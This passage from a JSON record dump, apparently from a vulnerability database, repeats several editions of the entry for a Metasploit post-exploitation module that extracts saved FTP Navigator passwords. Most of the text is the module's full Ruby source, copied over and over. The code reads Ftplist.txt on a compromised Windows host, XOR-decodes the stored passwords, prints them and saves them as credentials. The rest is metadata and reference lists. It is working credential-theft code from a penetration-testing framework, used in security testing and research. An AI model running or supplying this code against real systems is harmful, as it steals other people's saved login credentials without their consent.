|line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/windows/gather/credentials/ftpnavigator.rb"}, "lastseen": "2018-01-23T01:16:50", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "2290cd29214183c1cddd7f481ca983ea", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-24T00:14:39", "history": [], "viewCount": 11, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/windows/gather/credentials/ftpnavigator.rb"}, "lastseen": "2018-01-24T00:14:39", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "569cd05e715b71277c4c5c66547ba342", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-10-08T09:49:08", "history": [], "viewCount": 11, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/windows/gather/credentials/ftpnavigator.rb"}, "lastseen": "2018-10-08T09:49:08", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "2290cd29214183c1cddd7f481ca983ea", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-10-08T11:49:31", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:6FA476CE00BC8482F43AF2BD9937FB32"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:88D0E22AEC73763DA2CFC04B17A18815", "CARBONBLACK:B027EA436203BDA814C4EA51081F6A87", "CARBONBLACK:89E99C6BF8DD5C2DDE08ED61C12701BF"]}, {"type": "kitploit", "idList": ["KITPLOIT:4252843133018759751", "KITPLOIT:9165290622393060450"]}, {"type": "threatpost", "idList": ["THREATPOST:2BC957556C770FF679DFF038E671E8DD", "THREATPOST:E0AC24C4B88E8B82713D84A09FFA6C95"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:8842738F7C86C87FD607E515176F88C8"]}, {"type": "exploitdb", "idList": ["EDB-ID:46348", "EDB-ID:46335", "EDB-ID:46334", "EDB-ID:46345", "EDB-ID:46343", "EDB-ID:46342", "EDB-ID:46338", "EDB-ID:46346"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891670", "OPENVAS:1361412562310891669", "OPENVAS:1361412562310891666"]}], "modified": "2018-10-08T11:49:31"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/windows/gather/credentials/ftpnavigator.rb"}, "lastseen": "2018-10-08T11:49:31", "differentElements": ["sourceData"], "edition": 11}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "68448f4c98648ea8ff01fb562a3cb809", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-02-27T00:04:10", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:7055349016929732627", "KITPLOIT:6949536995471552388", "KITPLOIT:3200189096382343882"]}, {"type": "thn", "idList": ["THN:06853145247DE3A0858240BE3299325B", "THN:E89CB77530DA6563CD7908EC5915AB48"]}, {"type": "threatpost", "idList": ["THREATPOST:0FAD77F5C06B2A0E96B72BC57226C843", "THREATPOST:D2D42FE30AC1A592093498FA03DF7818", "THREATPOST:BCE2F5026DA3F1BC02803E1986151B89"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142047", "OPENVAS:1361412562310891689", "OPENVAS:1361412562310142049", "OPENVAS:1361412562310142045", "OPENVAS:1361412562310814856"]}, {"type": "ubuntu", "idList": ["USN-3894-1"]}, {"type": "ics", "idList": ["ICSA-19-057-01"]}, {"type": "cve", "idList": ["CVE-2019-6266", "CVE-2019-6265", "CVE-2019-9116"]}, {"type": "schneier", "idList": ["SCHNEIER:F989389C78989A5E2BEE8B655E76C856"]}, {"type": "exploitdb", "idList": ["EDB-ID:46454"]}], "modified": "2019-02-27T00:04:10"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/windows/gather/credentials/ftpnavigator.rb"}, "lastseen": "2019-02-27T00:04:10", "differentElements": ["sourceData"], "edition": 12}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "2290cd29214183c1cddd7f481ca983ea", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-02-27T02:06:22", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:7055349016929732627", "KITPLOIT:6949536995471552388", "KITPLOIT:3200189096382343882"]}, {"type": "thn", "idList": ["THN:06853145247DE3A0858240BE3299325B", "THN:E89CB77530DA6563CD7908EC5915AB48"]}, {"type": "threatpost", "idList": ["THREATPOST:0FAD77F5C06B2A0E96B72BC57226C843", "THREATPOST:D2D42FE30AC1A592093498FA03DF7818", "THREATPOST:BCE2F5026DA3F1BC02803E1986151B89"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142047", "OPENVAS:1361412562310891689", "OPENVAS:1361412562310142045", "OPENVAS:1361412562310142049"]}, {"type": "ubuntu", "idList": ["USN-3894-1"]}, {"type": "ics", "idList": ["ICSA-19-057-01"]}, {"type": "cve", "idList": ["CVE-2019-6266", "CVE-2019-6265", "CVE-2019-9116"]}, {"type": "schneier", "idList": ["SCHNEIER:F989389C78989A5E2BEE8B655E76C856"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:151824", "PACKETSTORM:151852"]}], "modified": "2019-02-27T02:06:22"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/windows/gather/credentials/ftpnavigator.rb"}, "lastseen": "2019-02-27T02:06:22", "differentElements": ["sourceData"], "edition": 13}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "68448f4c98648ea8ff01fb562a3cb809", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-03-20T19:57:03", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:46513", "EDB-ID:46580", "EDB-ID:46579", "EDB-ID:46581", "EDB-ID:46578", "EDB-ID:46559"]}, {"type": "cisco", "idList": ["CISCO-SA-20190320-IP-PHONE-RCE", "CISCO-SA-20190320-IPFUDOS"]}, {"type": "threatpost", "idList": ["THREATPOST:31C38D25CE2756FFB497066C313CD3AD", "THREATPOST:ECD97BEAB3D2E907D51D925A4C19C446", "THREATPOST:6ACC9D98576B1ECFA80240E5B31D26F8", "THREATPOST:197F8EFD3E720C39B40F6E5B30335DDC", "THREATPOST:FBD4AA8F9FFFE6BFC241C3F763CD66FB"]}, {"type": "kitploit", "idList": ["KITPLOIT:6777350564871044019"]}, {"type": "talosblog", "idList": ["TALOSBLOG:609BF6BFDB9A1E306B71EDB2112B7AE0", "TALOSBLOG:188CF43F29220F8F58B8C40173C420B5"]}, {"type": "thn", "idList": ["THN:2EEF392C11E0C0F9DD69A34D1DA30432", "THN:B650445577B845AD521728D6AEF15603"]}, {"type": "jakearchibald", "idList": ["JAKEARCHIBALD:9A81BA9AB1D3A7C870F699D04D6D4EB4"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891717"]}], "modified": "2019-03-20T19:57:03"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/windows/gather/credentials/ftpnavigator.rb"}, "lastseen": "2019-03-20T19:57:03", "differentElements": ["sourceData"], "edition": 14}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "2290cd29214183c1cddd7f481ca983ea", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-03-20T21:33:33", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:46513", "EDB-ID:46579", "EDB-ID:46580", "EDB-ID:46581", "EDB-ID:46578"]}, {"type": "kitploit", "idList": ["KITPLOIT:4632630842516742319", "KITPLOIT:6777350564871044019"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:F099654AA95F6498DB33414802DBA792"]}, {"type": "threatpost", "idList": ["THREATPOST:973AF9DCDCA807B8991F3863EED966D9", "THREATPOST:31C38D25CE2756FFB497066C313CD3AD", "THREATPOST:ECD97BEAB3D2E907D51D925A4C19C446", "THREATPOST:6ACC9D98576B1ECFA80240E5B31D26F8", "THREATPOST:197F8EFD3E720C39B40F6E5B30335DDC", "THREATPOST:FBD4AA8F9FFFE6BFC241C3F763CD66FB"]}, {"type": "cisco", "idList": ["CISCO-SA-20190320-IP-PHONE-RCE", "CISCO-SA-20190320-IPFUDOS"]}, {"type": "talosblog", "idList": ["TALOSBLOG:609BF6BFDB9A1E306B71EDB2112B7AE0", "TALOSBLOG:188CF43F29220F8F58B8C40173C420B5"]}, {"type": "thn", "idList": ["THN:2EEF392C11E0C0F9DD69A34D1DA30432"]}, {"type": "jakearchibald", "idList": ["JAKEARCHIBALD:9A81BA9AB1D3A7C870F699D04D6D4EB4"]}], "modified": "2019-03-20T21:33:33"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/windows/gather/credentials/ftpnavigator.rb"}, "lastseen": "2019-03-20T21:33:33", "differentElements": ["sourceData"], "edition": 15}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "68448f4c98648ea8ff01fb562a3cb809", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-28T22:42:34", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:713763628505199617", "KITPLOIT:1970484045196480689", "KITPLOIT:4422912280922039253"]}, {"type": "zdt", "idList": ["1337DAY-ID-32604", "1337DAY-ID-32603", "1337DAY-ID-32600"]}, {"type": "cve", "idList": ["CVE-2019-11576", "CVE-2019-11220", "CVE-2019-9809", "CVE-2019-9801", "CVE-2019-9794"]}, {"type": "pentestit", "idList": ["PENTESTIT:0DC2B99B965A9B217A58DF8F23F27EBE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152654", "PACKETSTORM:152645"]}, {"type": "threatpost", "idList": ["THREATPOST:DDB6E2767CFC8FF972505D4C12E6AB6B", "THREATPOST:142DAF150C2BF9EB70ECE95F46939532"]}, {"type": "krebs", "idList": ["KREBS:D06BB2ED80FC78A9E454F45E0A04688C"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:DF960CBD9C764BBC152744F203C9E4C1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:08F7CDCB6DB85933D5481B61F4DBD8EE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891764"]}], "modified": "2019-04-28T22:42:34"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/windows/gather/credentials/ftpnavigator.rb"}, "lastseen": "2019-04-28T22:42:34", "differentElements": ["sourceData"], "edition": 16}, {"bulletin": {"id": 